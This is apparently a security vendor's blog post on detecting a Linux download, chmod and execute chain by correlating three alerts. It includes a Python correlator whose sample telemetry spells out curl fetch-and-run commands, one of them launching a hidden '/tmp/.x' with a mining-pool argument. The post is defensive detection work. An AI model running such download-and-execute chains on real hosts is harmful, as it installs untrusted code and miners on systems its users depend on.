Find Gold in the Mundane: How Common Linux System Activity Reveals Hidden Insights
When simple user activities combine into one effective threat detection
The security community has made significant strides in understanding threat actor tactics, techniques, and procedures, but knowledge of those TTPs alone is not enough to improve threat detection accuracy. To make sense of the noise we see in security monitoring, we sequence atomic-level indicators into chains that produce high-fidelity detections. The Anvilogic Forge team continually looks for such sequences of threat activity to build threat scenarios that detect adversary behaviors. We embrace the noise generated by an individual alert because it holds information that, paired with another alert, produces something greater.
That something greater is a threat scenario. A threat scenario combines an essential activity with other threat indicators to produce a sequence of events worth investigating. One of the simplest examples is on Linux, where we unify detections for file download, file modification, and file execution. Together they cover the core behaviors needed to get a downloaded file running. In many security operations centers (SOCs), each of those three activities on its own produces a noisy, low-value detection: administrators download files, set permissions, and run binaries all day. The value of the scenario lies in treating the three behaviors as a whole, on the same host and the same file, in that order and within a short window. Correlated this way, the three detections produce one high-fidelity alert that captures the entire malicious chain rather than a fragment of it. The scenario tells the complete story an analyst needs for an investigation, instead of requiring them to hunt three separate atomic-level indicators across large datasets.
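The correlation described above, as an added example rather than Anvilogic's own detection code: three noisy atomic signals (a downloader writing a file, chmod adding an execute bit, and a process launched from that path) are reduced from raw process events and only alert when all three land on the same host and file, in order, inside a time window. The event schema (host, ts, cmd), the 30-minute window, the sample telemetry, and the assumption that downloads name their output file explicitly are all constructed for the example.

```python
"""Threat scenario: Linux file download -> file modification -> file execution.

Added example (not Anvilogic's own detection code). It shows how three
noisy atomic signals become one high-fidelity alert when they are
correlated per host and file within a time window. The event schema
(host, ts, cmd) and the 30-minute window are assumptions.
"""
import shlex
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)          # assumed maximum span of the chain
DOWNLOADERS = {"curl", "wget"}
OUTPUT_FLAGS = {"-o", "--output", "-O", "--output-document"}


def is_exec_mode(mode):
    """True for chmod arguments that add an execute bit (+x or octal with an x bit set)."""
    if "x" in mode and "+" in mode:
        return True
    digits = mode[-3:]
    return mode.isdigit() and len(mode) in (3, 4) and any(int(d) & 1 for d in digits)


def output_path(argv):
    """Target file of a curl/wget invocation; assumes an explicit output flag."""
    for i, arg in enumerate(argv[:-1]):
        if arg in OUTPUT_FLAGS:
            return argv[i + 1]
    return None


def classify(event):
    """Reduce one process event to an atomic signal: (kind, path) or None."""
    argv = shlex.split(event["cmd"])
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in DOWNLOADERS:
        path = output_path(argv)
        return ("download", path) if path else None
    if prog == "chmod" and len(argv) >= 3 and is_exec_mode(argv[1]):
        return ("modify", argv[2])      # assumes a single target file
    if "/" in argv[0]:                  # a program launched by path, e.g. /tmp/.x
        return ("execute", argv[0])
    return None


def correlate(events, window=WINDOW):
    """Emit one alert per (host, file) whose download, +x and execution
    occur in that order within `window`. Partial chains never alert."""
    chains = {}                          # (host, path) -> {"download": ts, "modify": ts}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        sig = classify(ev)
        if sig is None:
            continue
        kind, path = sig
        ts = datetime.fromisoformat(ev["ts"])
        key = (ev["host"], path)
        if kind == "download":
            chains[key] = {"download": ts}      # a fresh download restarts the chain
        elif kind == "modify" and key in chains:
            chains[key]["modify"] = ts          # only counts after a download
        elif kind == "execute" and key in chains and "modify" in chains[key]:
            if ts - chains[key]["download"] <= window:
                alerts.append({"host": ev["host"], "path": path,
                               "downloaded": chains[key]["download"].isoformat(),
                               "executed": ts.isoformat()})
            del chains[key]                     # one alert per chain; stale chains dropped
    return alerts


# Constructed sample telemetry: one complete chain plus three kinds of noise.
SAMPLE_EVENTS = [
    # web-01: download, chmod +x, execute within seconds -> the only alert
    {"host": "web-01", "ts": "2023-03-01T10:00:00",
     "cmd": "curl -fsSL http://203.0.113.5/x86_64 -o /tmp/.x"},
    {"host": "web-01", "ts": "2023-03-01T10:00:04", "cmd": "chmod +x /tmp/.x"},
    {"host": "web-01", "ts": "2023-03-01T10:00:05", "cmd": "/tmp/.x -o pool.example:3333"},
    # build-02: download only (an admin fetching sources) -> no alert
    {"host": "build-02", "ts": "2023-03-01T10:10:00",
     "cmd": "wget https://example.org/src.tar.gz -O /opt/src.tar.gz"},
    # db-03: chmod and execution of a file nobody downloaded -> no alert
    {"host": "db-03", "ts": "2023-03-01T10:20:00", "cmd": "chmod 755 /usr/local/bin/backup.sh"},
    {"host": "db-03", "ts": "2023-03-01T10:20:01", "cmd": "/usr/local/bin/backup.sh"},
    # app-04: full chain, but execution two hours after download -> outside window
    {"host": "app-04", "ts": "2023-03-01T11:00:00",
     "cmd": "curl http://203.0.113.5/setup -o /var/tmp/setup"},
    {"host": "app-04", "ts": "2023-03-01T11:00:10", "cmd": "chmod 700 /var/tmp/setup"},
    {"host": "app-04", "ts": "2023-03-01T13:00:00", "cmd": "/var/tmp/setup"},
]


def run_sample():
    """Run the correlator over the constructed events; returns the alert list."""
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Only the web-01 chain alerts. The download-only host, the host that marks and runs a file it never downloaded, and the chain that completes outside the window all stay silent, which is the point: each stage is routine on its own, and the fidelity comes from the keyed, ordered, time-bounded join. A production version would key on inode or file hash rather than path, since attackers rename and move files between stages.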
On Linux hosts, the sequence of file download, file modification, and file execution can indicate a potential threat. Scripts that install coinminers and backdoor malware have been found to use this exact sequence, and threat actors including APT36, TeamTNT, and Lorenz have been attributed with this type of activity. By monitoring the sequence, organizations can detect and respond to such threats before they do significant damage or compromise the integrity of the system.
Monitoring file download, file modification, and file execution on a Linux host is essential to maintaining a secure environment. When monitored together, these three activities provide a golden opportunity to identify potentially malicious behavior before it compromises a system. The Anvilogic Forge is focused on identifying core threat behaviors to raise the quality of the detections customers run in their networks. A single detection may meet attack criteria on its own; incorporating more atomic detections into the sequence adds immensely to its value. They are better together.